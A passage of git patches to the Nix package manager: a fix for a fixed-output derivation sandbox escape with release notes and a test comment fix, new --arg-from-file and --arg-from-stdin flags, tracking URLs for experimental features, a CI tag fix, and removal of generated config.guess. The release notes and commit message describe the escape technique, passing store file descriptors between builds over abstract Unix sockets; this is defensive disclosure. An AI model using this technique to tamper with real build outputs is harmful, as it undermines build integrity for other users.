index 8f4fa2621..98de31e13 100644
--- a/tests/nixos/default.nix
+++ b/tests/nixos/default.nix
@@ -109,7 +109,7 @@ in
       nix.package = lib.mkForce pkgs.nixVersions.nix_2_13;
     };
   };
-  
+
   # TODO: (nixpkgs update) remoteBuildsSshNg_remote_2_18 = ...
 
   # Test our Nix as a builder for clients that are older
@@ -156,4 +156,6 @@ in
     (system: runNixOSTestFor system ./setuid.nix);
 
   fetch-git = runNixOSTestFor "x86_64-linux" ./fetch-git;
+
+  ca-fd-leak = runNixOSTestFor "x86_64-linux" ./ca-fd-leak;
 }

From c3878f510ec12ca6bf24505989e7463249dab61a Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 <7226587+thufschmitt@users.noreply.github.com>
Date: Tue, 13 Feb 2024 08:28:02 +0100
Subject: [PATCH 541/654] Copy the output of fixed-output derivations before
 registering them

It is possible to exfiltrate a file descriptor out of the build sandbox
of FODs, and use it to modify the store path after it has been
registered.
To avoid that issue, don't register the output of the build, but a copy
of it (that will be free of any leaked file descriptor).
---
 src/libstore/build/local-derivation-goal.cc | 6 ++++++
 src/libutil/file-system.cc                  | 5 +++++
 src/libutil/file-system.hh                  | 7 +++++++
 3 files changed, 18 insertions(+)

diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc
index a9b8de123..d2e2f523e 100644
--- a/src/libstore/build/local-derivation-goal.cc
+++ b/src/libstore/build/local-derivation-goal.cc
@@ -2543,6 +2543,12 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs()
             [&](const DerivationOutput::CAFixed & dof) {
                 auto & wanted = dof.ca.hash;
 
+                // Replace the output by a fresh copy of itself to make sure
+                // that there's no stale file descriptor pointing to it
+                Path tmpOutput = actualPath + ".tmp";
+                renameFile(actualPath, tmpOutput);
+                copyFile(tmpOutput, actualPath, true);
+
                 auto newInfo0 = newInfoFromCA(DerivationOutput::CAFloating {
                     .method = dof.ca.method,
                     .hashAlgo = wanted.algo,
diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc
index b0a3f0797..9dd6a5133 100644
--- a/src/libutil/file-system.cc
+++ b/src/libutil/file-system.cc
@@ -617,6 +617,11 @@ void copy(const fs::directory_entry & from, const fs::path & to, bool andDelete)
     }
 }
 
+void copyFile(const Path & oldPath, const Path & newPath, bool andDelete)
+{
+    return copy(fs::directory_entry(fs::path(oldPath)), fs::path(newPath), andDelete);
+}
+
 void renameFile(const Path & oldName, const Path & newName)
 {
     fs::rename(oldName, newName);
diff --git a/src/libutil/file-system.hh b/src/libutil/file-system.hh
index 464efc242..963265e34 100644
--- a/src/libutil/file-system.hh
+++ b/src/libutil/file-system.hh
@@ -186,6 +186,13 @@ void renameFile(const Path & src, const Path & dst);
  */
 void moveFile(const Path & src, const Path & dst);
 
+/**
+ * Recursively copy the content of `oldPath` to `newPath`. If `andDelete` is
+ * `true`, then also remove `oldPath` (making this equivalent to `moveFile`, but
+ * with the guarantee that the destination will be “fresh”, with no stale inode
+ * or file descriptor pointing to it).
+ */
+void copyFile(const Path & oldPath, const Path & newPath, bool andDelete);
 
 /**
  * Automatic cleanup of resources.

From 65b79c52c66643a04bd9eb69b92d7e5c5587ca64 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 <7226587+thufschmitt@users.noreply.github.com>
Date: Wed, 21 Feb 2024 17:32:36 +0100
Subject: [PATCH 542/654] Fix a typo in a test comment

Co-authored-by: Valentin Gagarin <valentin.gagarin@tweag.io>
---
 tests/nixos/ca-fd-leak/default.nix | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix
index 40e57ea02..a6ae72adc 100644
--- a/tests/nixos/ca-fd-leak/default.nix
+++ b/tests/nixos/ca-fd-leak/default.nix
@@ -80,7 +80,7 @@ in
     # Tell the smuggler server that we're done
     machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}")
 
-    # Check that the file was modified
+    # Check that the file was not modified
     machine.succeed(r"""
       cat ./result
       test "$(cat ./result)" = "hello, world"

From cd9baa18093cf863a852334721ea972bcd0c5902 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 <7226587+thufschmitt@users.noreply.github.com>
Date: Fri, 1 Mar 2024 09:31:05 +0100
Subject: [PATCH 543/654] Add release notes

---
 doc/manual/rl-next/fod-sandbox-escape.md | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
 create mode 100644 doc/manual/rl-next/fod-sandbox-escape.md

diff --git a/doc/manual/rl-next/fod-sandbox-escape.md b/doc/manual/rl-next/fod-sandbox-escape.md
new file mode 100644
index 000000000..ed451711e
--- /dev/null
+++ b/doc/manual/rl-next/fod-sandbox-escape.md
@@ -0,0 +1,14 @@
+---
+synopsis: Fix a FOD sandbox escape
+issues:
+prs:
+---
+
+Cooperating Nix derivations could send file descriptors to files in the Nix
+store to each other via Unix domain sockets in the abstract namespace. This
+allowed one derivation to modify the output of the other derivation, after Nix
+has registered the path as "valid" and immutable in the Nix database.
+In particular, this allowed the output of fixed-output derivations to be
+modified from their expected content.
+
+This isn't the case any more.

From d72ee91d07a286b18862235792326297199a0d75 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra <edolstra@gmail.com>
Date: Fri, 1 Mar 2024 14:14:14 +0100
Subject: [PATCH 544/654] Clean up --arg processing

---
 src/libcmd/common-eval-args.cc | 20 ++++++++++++--------
 src/libcmd/common-eval-args.hh |  7 ++++++-
 2 files changed, 18 insertions(+), 9 deletions(-)

diff --git a/src/libcmd/common-eval-args.cc b/src/libcmd/common-eval-args.cc
index 444ff81c9..ed2c126a4 100644
--- a/src/libcmd/common-eval-args.cc
+++ b/src/libcmd/common-eval-args.cc
@@ -20,7 +20,7 @@ MixEvalArgs::MixEvalArgs()
         .description = "Pass the value *expr* as the argument *name* to Nix functions.",
         .category = category,
         .labels = {"name", "expr"},
-        .handler = {[&](std::string name, std::string expr) { autoArgs[name] = 'E' + expr; }}
+        .handler = {[&](std::string name, std::string expr) { autoArgs.insert_or_assign(name, AutoArg{AutoArgExpr(expr)}); }}
     });
 
     addFlag({
@@ -28,7 +28,7 @@ MixEvalArgs::MixEvalArgs()
         .description = "Pass the string *string* as the argument *name* to Nix functions.",
         .category = category,
         .labels = {"name", "string"},
-        .handler = {[&](std::string name, std::string s) { autoArgs[name] = 'S' + s; }},
+        .handler = {[&](std::string name, std::string s) { autoArgs.insert_or_assign(name, AutoArg{AutoArgString(s)}); }},
     });
 
     addFlag({
@@ -154,13 +154,17 @@ MixEvalArgs::MixEvalArgs()
 Bindings * MixEvalArgs::getAutoArgs(EvalState & state)
 {
     auto res = state.buildBindings(autoArgs.size());
-    for (auto & i : autoArgs) {
+    for (auto & [name, arg] : autoArgs) {
         auto v = state.allocValue();
-        if (i.second[0] == 'E')
-            state.mkThunk_(*v, state.parseExprFromString(i.second.substr(1), state.rootPath(".")));
-        else
-            v->mkString(((std::string_view) i.second).substr(1));
-        res.insert(state.symbols.create(i.first), v);
+        std::visit(overloaded {
+            [&](const AutoArgExpr & arg) {
+                state.mkThunk_(*v, state.parseExprFromString(arg.expr, state.rootPath(".")));
+            },
+            [&](const AutoArgString & arg) {
+                v->mkString(arg.s);
+            }
+        }, arg);
+        res.insert(state.symbols.create(name), v);
     }
     return res.finish();
 }
diff --git a/src/libcmd/common-eval-args.hh b/src/libcmd/common-eval-args.hh
index 2eb63e15d..2e2f18385 100644
--- a/src/libcmd/common-eval-args.hh
+++ b/src/libcmd/common-eval-args.hh
@@ -26,7 +26,12 @@ struct MixEvalArgs : virtual Args, virtual MixRepair
     std::optional<std::string> evalStoreUrl;
 
 private:
-    std::map<std::string, std::string> autoArgs;
+    struct AutoArgExpr { std::string expr; };
+    struct AutoArgString { std::string s; };
+
+    using AutoArg = std::variant<AutoArgExpr, AutoArgString>;
+
+    std::map<std::string, AutoArg> autoArgs;
 };
 
 SourcePath lookupFileArg(EvalState & state, std::string_view s, const Path * baseDir = nullptr);

From 291b10c607e3f9d19acee692ac2488056e53eeee Mon Sep 17 00:00:00 2001
From: Eelco Dolstra <edolstra@gmail.com>
Date: Fri, 1 Mar 2024 14:35:27 +0100
Subject: [PATCH 545/654] Add --arg-from-file for reading a string from a file

---
 src/libcmd/common-eval-args.cc | 12 ++++++++++++
 src/libcmd/common-eval-args.hh |  3 ++-
 tests/functional/eval.sh       |  8 ++++++++
 3 files changed, 22 insertions(+), 1 deletion(-)

diff --git a/src/libcmd/common-eval-args.cc b/src/libcmd/common-eval-args.cc
index ed2c126a4..89df67406 100644
--- a/src/libcmd/common-eval-args.cc
+++ b/src/libcmd/common-eval-args.cc
@@ -31,6 +31,15 @@ MixEvalArgs::MixEvalArgs()
         .handler = {[&](std::string name, std::string s) { autoArgs.insert_or_assign(name, AutoArg{AutoArgString(s)}); }},
     });
 
+    addFlag({
+        .longName = "arg-from-file",
+        .description = "Pass the contents of file *path* as the argument *name* to Nix functions.",
+        .category = category,
+        .labels = {"name", "path"},
+        .handler = {[&](std::string name, std::string path) { autoArgs.insert_or_assign(name, AutoArg{AutoArgFile(path)}); }},
+        .completer = completePath
+    });
+
     addFlag({
         .longName = "include",
         .shortName = 'I',
@@ -162,6 +171,9 @@ Bindings * MixEvalArgs::getAutoArgs(EvalState & state)
             },
             [&](const AutoArgString & arg) {
                 v->mkString(arg.s);
+            },
+            [&](const AutoArgFile & arg) {
+                v->mkString(readFile(arg.path));
             }
         }, arg);
         res.insert(state.symbols.create(name), v);
diff --git a/src/libcmd/common-eval-args.hh b/src/libcmd/common-eval-args.hh
index 2e2f18385..9f4da4231 100644
--- a/src/libcmd/common-eval-args.hh
+++ b/src/libcmd/common-eval-args.hh
@@ -28,8 +28,9 @@ struct MixEvalArgs : virtual Args, virtual MixRepair
 private:
     struct AutoArgExpr { std::string expr; };
     struct AutoArgString { std::string s; };
+    struct AutoArgFile { std::filesystem::path path; };
 
-    using AutoArg = std::variant<AutoArgExpr, AutoArgString>;
+    using AutoArg = std::variant<AutoArgExpr, AutoArgString, AutoArgFile>;
 
     std::map<std::string, AutoArg> autoArgs;
 };
diff --git a/tests/functional/eval.sh b/tests/functional/eval.sh
index b81bb1e2c..321593670 100644
--- a/tests/functional/eval.sh
+++ b/tests/functional/eval.sh
@@ -41,3 +41,11 @@ mkdir -p $TEST_ROOT/xyzzy $TEST_ROOT/foo
 ln -sfn ../xyzzy $TEST_ROOT/foo/bar
 printf 123 > $TEST_ROOT/xyzzy/default.nix
 [[ $(nix eval --impure --expr "import $TEST_ROOT/foo/bar") = 123 ]]
+
+# Test --arg-from-file.
+[[ "$(nix eval --raw --arg-from-file foo config.nix --expr '{ foo }: { inherit foo; }' foo)" = "$(cat config.nix)" ]]
+
+# Check that special(-ish) files are drained.
+if [[ -e /proc/version ]]; then
+    [[ "$(nix eval --raw --arg-from-file foo /proc/version --expr '{ foo }: { inherit foo; }' foo)" = "$(cat /proc/version)" ]]
+fi

From 8ce1f6800b9eef394d2cb9dffdf99e7a6ffec64a Mon Sep 17 00:00:00 2001
From: Eelco Dolstra <edolstra@gmail.com>
Date: Fri, 1 Mar 2024 14:39:42 +0100
Subject: [PATCH 546/654] Add --arg-from-stdin to read an argument from stdin

---
 src/libcmd/common-eval-args.cc | 11 +++++++++++
 src/libcmd/common-eval-args.hh |  3 ++-
 tests/functional/eval.sh       |  3 +++
 3 files changed, 16 insertions(+), 1 deletion(-)

diff --git a/src/libcmd/common-eval-args.cc b/src/libcmd/common-eval-args.cc
index 89df67406..b87bbbc27 100644
--- a/src/libcmd/common-eval-args.cc
+++ b/src/libcmd/common-eval-args.cc
@@ -40,6 +40,14 @@ MixEvalArgs::MixEvalArgs()
         .completer = completePath
     });
 
+    addFlag({
+        .longName = "arg-from-stdin",
+        .description = "Pass the contents of stdin as the argument *name* to Nix functions.",
+        .category = category,
+        .labels = {"name"},
+        .handler = {[&](std::string name) { autoArgs.insert_or_assign(name, AutoArg{AutoArgStdin{}}); }},
+    });
+
     addFlag({
         .longName = "include",
         .shortName = 'I',
@@ -174,6 +182,9 @@ Bindings * MixEvalArgs::getAutoArgs(EvalState & state)
             },
             [&](const AutoArgFile & arg) {
                 v->mkString(readFile(arg.path));
+            },
+            [&](const AutoArgStdin & arg) {
+                v->mkString(readFile(STDIN_FILENO));
             }
         }, arg);
         res.insert(state.symbols.create(name), v);
diff --git a/src/libcmd/common-eval-args.hh b/src/libcmd/common-eval-args.hh
index 9f4da4231..7548bd3b7 100644
--- a/src/libcmd/common-eval-args.hh
+++ b/src/libcmd/common-eval-args.hh
@@ -29,8 +29,9 @@ private:
     struct AutoArgExpr { std::string expr; };
     struct AutoArgString { std::string s; };
     struct AutoArgFile { std::filesystem::path path; };
+    struct AutoArgStdin { };
 
-    using AutoArg = std::variant<AutoArgExpr, AutoArgString, AutoArgFile>;
+    using AutoArg = std::variant<AutoArgExpr, AutoArgString, AutoArgFile, AutoArgStdin>;
 
     std::map<std::string, AutoArg> autoArgs;
 };
diff --git a/tests/functional/eval.sh b/tests/functional/eval.sh
index 321593670..c6a475cd0 100644
--- a/tests/functional/eval.sh
+++ b/tests/functional/eval.sh
@@ -49,3 +49,6 @@ printf 123 > $TEST_ROOT/xyzzy/default.nix
 if [[ -e /proc/version ]]; then
     [[ "$(nix eval --raw --arg-from-file foo /proc/version --expr '{ foo }: { inherit foo; }' foo)" = "$(cat /proc/version)" ]]
 fi
+
+# Test --arg-from-stdin.
+[[ "$(echo bla | nix eval --raw --arg-from-stdin foo --expr '{ foo }: { inherit foo; }' foo)" = bla ]]

From 1bc89b588b04b31d14398da015c0aa6693942a67 Mon Sep 17 00:00:00 2001
From: med8bra 
Date: Thu, 29 Feb 2024 13:27:48 +0100
Subject: [PATCH 547/654] doc(xp-feature): add issue url in experimental
 feature details

---
 src/libutil/experimental-features.cc | 30 +++++++++++++++++++++++++---
 1 file changed, 27 insertions(+), 3 deletions(-)

diff --git a/src/libutil/experimental-features.cc b/src/libutil/experimental-features.cc
index 9b46fc5b0..374e674af 100644
--- a/src/libutil/experimental-features.cc
+++ b/src/libutil/experimental-features.cc
@@ -1,4 +1,5 @@
 #include "experimental-features.hh"
+#include "fmt.hh"
 #include "util.hh"
 
 #include "nlohmann/json.hpp"
@@ -10,6 +11,7 @@ struct ExperimentalFeatureDetails
     ExperimentalFeature tag;
     std::string_view name;
     std::string_view description;
+    std::string_view trackingUrl;
 };
 
 /**
@@ -35,6 +37,7 @@ constexpr std::array xpFeatureDetails
             [__contentAddressed](@docroot@/language/advanced-attributes.md#adv-attr-__contentAddressed)
             for details.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/35",
     },
     {
         .tag = Xp::ImpureDerivations,
@@ -65,6 +68,7 @@ constexpr std::array xpFeatureDetails
 
             This is a more explicit alternative to using [`builtins.currentTime`](@docroot@/language/builtin-constants.md#builtins-currentTime).
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/42",
     },
     {
         .tag = Xp::Flakes,
@@ -73,6 +77,7 @@ constexpr std::array xpFeatureDetails
             Enable flakes. See the manual entry for [`nix
             flake`](@docroot@/command-ref/new-cli/nix3-flake.md) for details.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/27",
     },
     {
         .tag = Xp::FetchTree,
@@ -86,6 +91,7 @@ constexpr std::array xpFeatureDetails
 
             Enabling just this feature serves as a "release candidate", allowing users to try it out in isolation.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/31",
     },
     {
         .tag = Xp::NixCommand,
@@ -94,6 +100,7 @@ constexpr std::array xpFeatureDetails
             Enable the new `nix` subcommands. See the manual on
             [`nix`](@docroot@/command-ref/new-cli/nix.md) for details.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/28",
     },
     {
         .tag = Xp::GitHashing,
@@ -102,6 +109,7 @@ constexpr std::array xpFeatureDetails
             Allow creating (content-addressed) store objects which are hashed via Git's hashing algorithm.
             These store objects will not be understandable by older versions of Nix.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/41",
     },
     {
         .tag = Xp::RecursiveNix,
@@ -143,6 +151,7 @@ constexpr std::array xpFeatureDetails
             already in the build inputs or built by a previous recursive Nix
             call.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/47",
     },
     {
         .tag = Xp::NoUrlLiterals,
@@ -184,6 +193,7 @@ constexpr std::array xpFeatureDetails
             containing parameters have to be quoted anyway, and unquoted URLs
             may confuse external tooling.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/44",
     },
     {
         .tag = Xp::FetchClosure,
@@ -191,6 +201,7 @@ constexpr std::array xpFeatureDetails
         .description = R"(
             Enable the use of the [`fetchClosure`](@docroot@/language/builtins.md#builtins-fetchClosure) built-in function in the Nix language.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/40",
     },
     {
         .tag = Xp::ReplFlake,
@@ -200,6 +211,7 @@ constexpr std::array xpFeatureDetails
 
             Allow passing [installables](@docroot@/command-ref/new-cli/nix.md#installables) to `nix repl`, making its interface consistent with the other experimental commands.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/32",
     },
     {
         .tag = Xp::AutoAllocateUids,
@@ -208,6 +220,7 @@ constexpr std::array xpFeatureDetails
             Allows Nix to automatically pick UIDs for builds, rather than creating
             `nixbld*` user accounts. See the [`auto-allocate-uids`](@docroot@/command-ref/conf-file.md#conf-auto-allocate-uids) setting for details.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/34",
     },
     {
         .tag = Xp::Cgroups,
@@ -216,6 +229,7 @@ constexpr std::array xpFeatureDetails
             Allows Nix to execute builds inside cgroups. See
             the [`use-cgroups`](@docroot@/command-ref/conf-file.md#conf-use-cgroups) setting for details.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/36",
     },
     {
         .tag = Xp::DaemonTrustOverride,
@@ -226,6 +240,7 @@ constexpr std::array xpFeatureDetails
             useful for various experiments with `nix-daemon --stdio`
             networking.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/38",
     },
     {
         .tag = Xp::DynamicDerivations,
@@ -239,6 +254,7 @@ constexpr std::array xpFeatureDetails
               - dependencies in derivations on the outputs of
                 derivations that are themselves derivations outputs.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/39",
     },
     {
         .tag = Xp::ParseTomlTimestamps,
@@ -246,6 +262,7 @@ constexpr std::array xpFeatureDetails
         .description = R"(
             Allow parsing of timestamps in builtins.fromTOML.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/45",
     },
     {
         .tag = Xp::ReadOnlyLocalStore,
@@ -253,6 +270,7 @@ constexpr std::array xpFeatureDetails
         .description = R"(
             Allow the use of the `read-only` parameter in [local store](@docroot@/store/types/local-store.md) URIs.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/46",
     },
     {
         .tag = Xp::ConfigurableImpureEnv,
@@ -260,6 +278,7 @@ constexpr std::array xpFeatureDetails
         .description = R"(
             Allow the use of the [impure-env](@docroot@/command-ref/conf-file.md#conf-impure-env) setting.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/37",
     },
     {
         .tag = Xp::MountedSSHStore,
@@ -267,6 +286,7 @@ constexpr std::array xpFeatureDetails
         .description = R"(
             Allow the use of the [`mounted SSH store`](@docroot@/command-ref/new-cli/nix3-help-stores.html#experimental-ssh-store-with-filesytem-mounted).
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/43",
     },
     {
         .tag = Xp::VerifiedFetches,
@@ -274,6 +294,7 @@ constexpr std::array xpFeatureDetails
         .description = R"(
             Enables verification of git commit signatures through the [`fetchGit`](@docroot@/language/builtins.md#builtins-fetchGit) built-in.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/48",
     },
 }};
 
@@ -312,9 +333,12 @@ std::string_view showExperimentalFeature(const ExperimentalFeature tag)
 nlohmann::json documentExperimentalFeatures()
 {
     StringMap res;
-    for (auto & xpFeature : xpFeatureDetails)
-        res[std::string { xpFeature.name }] =
-            trim(stripIndentation(xpFeature.description));
+    for (auto & xpFeature : xpFeatureDetails) {
+        std::stringstream docOss;
+        docOss << stripIndentation(xpFeature.description);
+        docOss << fmt("\nRefer to [%1% tracking issue](%2%) for feature tracking.", xpFeature.name, xpFeature.trackingUrl);
+        res[std::string{xpFeature.name}] = trim(docOss.str());
+    }
     return (nlohmann::json) res;
 }
 

From 089d91ed4c298f4757ce61c558cc3b2604435ff0 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 <7226587+thufschmitt@users.noreply.github.com>
Date: Sat, 2 Mar 2024 09:00:42 +0100
Subject: [PATCH 548/654] Fix the docker push job

After https://github.com/NixOS/nix/pull/10071, the CI was trying to push
ghcr.io/nixos/nix:master for backwards-compatibility, but the image was
not tagged as such, causing the job to fail.

Fix this.
---
 .github/workflows/ci.yml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 2aa3a3300..620a84b79 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -157,4 +157,5 @@ jobs:
         docker push $IMAGE_ID:$NIX_VERSION
         docker push $IMAGE_ID:latest
         # deprecated 2024-02-24
+        docker tag nix:$NIX_VERSION $IMAGE_ID:master
         docker push $IMAGE_ID:master

From f8dc9bc563c66c852452dd9a22c12c9bec35c309 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 <7226587+thufschmitt@users.noreply.github.com>
Date: Sat, 2 Mar 2024 10:17:55 +0100
Subject: [PATCH 549/654] Remove and gitignore the autoreconf generated files

No need to have them checked-in since we require running `autoreconf`
when building, and these are regenerated by the `autoreconf` script.
---
 .gitignore          |    1 +
 config/config.guess | 1700 ---------------------------------------
 config/config.sub   | 1860 -------------------------------------------
 3 files changed, 1 insertion(+), 3560 deletions(-)
 delete mode 100755 config/config.guess
 delete mode 100755 config/config.sub

diff --git a/.gitignore b/.gitignore
index 5c1136823..7bf77adf4 100644
--- a/.gitignore
+++ b/.gitignore
@@ -10,6 +10,7 @@ perl/Makefile.config
 /stamp-h1
 /svn-revision
 /libtool
+/config/config.*
 
 # /doc/manual/
 /doc/manual/*.1
diff --git a/config/config.guess b/config/config.guess
deleted file mode 100755
index 1972fda8e..000000000
--- a/config/config.guess
+++ /dev/null
@@ -1,1700 +0,0 @@
-#! /bin/sh
-# Attempt to guess a canonical system name.
-#   Copyright 1992-2021 Free Software Foundation, Inc.
-
-timestamp='2021-01-25'
-
-# This file is free software; you can redistribute it and/or modify it
-# under the terms of the GNU General Public License as published by
-# the Free Software Foundation; either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful, but
-# WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-# General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program; if not, see <https://www.gnu.org/licenses/>.
-#
-# As a special exception to the GNU General Public License, if you
-# distribute this file as part of a program that contains a
-# configuration script generated by Autoconf, you may include it under
-# the same distribution terms that you use for the rest of that
-# program.  This Exception is an additional permission under section 7
-# of the GNU General Public License, version 3 ("GPLv3").
-#
-# Originally written by Per Bothner; maintained since 2000 by Ben Elliston.
-#
-# You can get the latest version of this script from:
-# https://git.savannah.gnu.org/cgit/config.git/plain/config.guess
-#
-# Please send patches to <config-patches@gnu.org>.
-
-
-me=$(echo "$0" | sed -e 's,.*/,,')
-
-usage="\
-Usage: $0 [OPTION]
-
-Output the configuration name of the system \`$me' is run on.
-
-Options:
-  -h, --help         print this help, then exit
-  -t, --time-stamp   print date of last modification, then exit
-  -v, --version      print version number, then exit
-
-Report bugs and patches to <config-patches@gnu.org>."
-
-version="\
-GNU config.guess ($timestamp)
-
-Originally written by Per Bothner.
-Copyright 1992-2021 Free Software Foundation, Inc.
-
-This is free software; see the source for copying conditions.  There is NO
-warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE."
-
-help="
-Try \`$me --help' for more information."
-
-# Parse command line
-while test $# -gt 0 ; do
-  case $1 in
-    --time-stamp | --time* | -t )
-       echo "$timestamp" ; exit ;;
-    --version | -v )
-       echo "$version" ; exit ;;
-    --help | --h* | -h )
-       echo "$usage"; exit ;;
-    -- )     # Stop option processing
-       shift; break ;;
-    - )	# Use stdin as input.
-       break ;;
-    -* )
-       echo "$me: invalid option $1$help" >&2
-       exit 1 ;;
-    * )
-       break ;;
-  esac
-done
-
-if test $# != 0; then
-  echo "$me: too many arguments$help" >&2
-  exit 1
-fi
-
-# CC_FOR_BUILD -- compiler used by this script. Note that the use of a
-# compiler to aid in system detection is discouraged as it requires
-# temporary files to be created and, as you can see below, it is a
-# headache to deal with in a portable fashion.
-
-# Historically, `CC_FOR_BUILD' used to be named `HOST_CC'. We still
-# use `HOST_CC' if defined, but it is deprecated.
-
-# Portable tmp directory creation inspired by the Autoconf team.
-
-tmp=
-# shellcheck disable=SC2172
-trap 'test -z "$tmp" || rm -fr "$tmp"' 0 1 2 13 15
-
-set_cc_for_build() {
-    # prevent multiple calls if $tmp is already set
-    test "$tmp" && return 0
-    : "${TMPDIR=/tmp}"
-    # shellcheck disable=SC2039
-    { tmp=$( (umask 077 && mktemp -d "$TMPDIR/cgXXXXXX") 2>/dev/null) && test -n "$tmp" && test -d "$tmp" ; } ||
-	{ test -n "$RANDOM" && tmp=$TMPDIR/cg$$-$RANDOM && (umask 077 && mkdir "$tmp" 2>/dev/null) ; } ||
-	{ tmp=$TMPDIR/cg-$$ && (umask 077 && mkdir "$tmp" 2>/dev/null) && echo "Warning: creating insecure temp directory" >&2 ; } ||
-	{ echo "$me: cannot create a temporary directory in $TMPDIR" >&2 ; exit 1 ; }
-    dummy=$tmp/dummy
-    case ${CC_FOR_BUILD-},${HOST_CC-},${CC-} in
-	,,)    echo "int x;" > "$dummy.c"
-	       for driver in cc gcc c89 c99 ; do
-		   if ($driver -c -o "$dummy.o" "$dummy.c") >/dev/null 2>&1 ; then
-		       CC_FOR_BUILD="$driver"
-		       break
-		   fi
-	       done
-	       if test x"$CC_FOR_BUILD" = x ; then
-		   CC_FOR_BUILD=no_compiler_found
-	       fi
-	       ;;
-	,,*)   CC_FOR_BUILD=$CC ;;
-	,*,*)  CC_FOR_BUILD=$HOST_CC ;;
-    esac
-}
-
-# This is needed to find uname on a Pyramid OSx when run in the BSD universe.
-# (ghazi@noc.rutgers.edu 1994-08-24)
-if test -f /.attbin/uname ; then
-	PATH=$PATH:/.attbin ; export PATH
-fi
-
-UNAME_MACHINE=$( (uname -m) 2>/dev/null) || UNAME_MACHINE=unknown
-UNAME_RELEASE=$( (uname -r) 2>/dev/null) || UNAME_RELEASE=unknown
-UNAME_SYSTEM=$( (uname -s) 2>/dev/null) || UNAME_SYSTEM=unknown
-UNAME_VERSION=$( (uname -v) 2>/dev/null) || UNAME_VERSION=unknown
-
-case "$UNAME_SYSTEM" in
-Linux|GNU|GNU/*)
-	LIBC=unknown
-
-	set_cc_for_build
-	cat <<-EOF > "$dummy.c"
-	#include 
-	#if defined(__UCLIBC__)
-	LIBC=uclibc
-	#elif defined(__dietlibc__)
-	LIBC=dietlibc
-	#elif defined(__GLIBC__)
-	LIBC=gnu
-	#else
-	#include 
-	/* First heuristic to detect musl libc.  */
-	#ifdef __DEFINED_va_list
-	LIBC=musl
-	#endif
-	#endif
-	EOF
-	eval "$($CC_FOR_BUILD -E "$dummy.c" 2>/dev/null | grep '^LIBC' | sed 's, ,,g')"
-
-	# Second heuristic to detect musl libc.
-	if [ "$LIBC" = unknown ] &&
-	   command -v ldd >/dev/null &&
-	   ldd --version 2>&1 | grep -q ^musl; then
-		LIBC=musl
-	fi
-
-	# If the system lacks a compiler, then just pick glibc.
-	# We could probably try harder.
-	if [ "$LIBC" = unknown ]; then
-		LIBC=gnu
-	fi
-	;;
-esac
-
-# Note: order is significant - the case branches are not exclusive.
-
-case "$UNAME_MACHINE:$UNAME_SYSTEM:$UNAME_RELEASE:$UNAME_VERSION" in
-    *:NetBSD:*:*)
-	# NetBSD (nbsd) targets should (where applicable) match one or
-	# more of the tuples: *-*-netbsdelf*, *-*-netbsdaout*,
-	# *-*-netbsdecoff* and *-*-netbsd*.  For targets that recently
-	# switched to ELF, *-*-netbsd* would select the old
-	# object file format.  This provides both forward
-	# compatibility and a consistent mechanism for selecting the
-	# object file format.
-	#
-	# Note: NetBSD doesn't particularly care about the vendor
-	# portion of the name.  We always set it to "unknown".
-	UNAME_MACHINE_ARCH=$( (uname -p 2>/dev/null || \
-	    /sbin/sysctl -n hw.machine_arch 2>/dev/null || \
-	    /usr/sbin/sysctl -n hw.machine_arch 2>/dev/null || \
-	    echo unknown))
-	case "$UNAME_MACHINE_ARCH" in
-	    aarch64eb) machine=aarch64_be-unknown ;;
-	    armeb) machine=armeb-unknown ;;
-	    arm*) machine=arm-unknown ;;
-	    sh3el) machine=shl-unknown ;;
-	    sh3eb) machine=sh-unknown ;;
-	    sh5el) machine=sh5le-unknown ;;
-	    earmv*)
-		arch=$(echo "$UNAME_MACHINE_ARCH" | sed -e 's,^e\(armv[0-9]\).*$,\1,')
-		endian=$(echo "$UNAME_MACHINE_ARCH" | sed -ne 's,^.*\(eb\)$,\1,p')
-		machine="${arch}${endian}"-unknown
-		;;
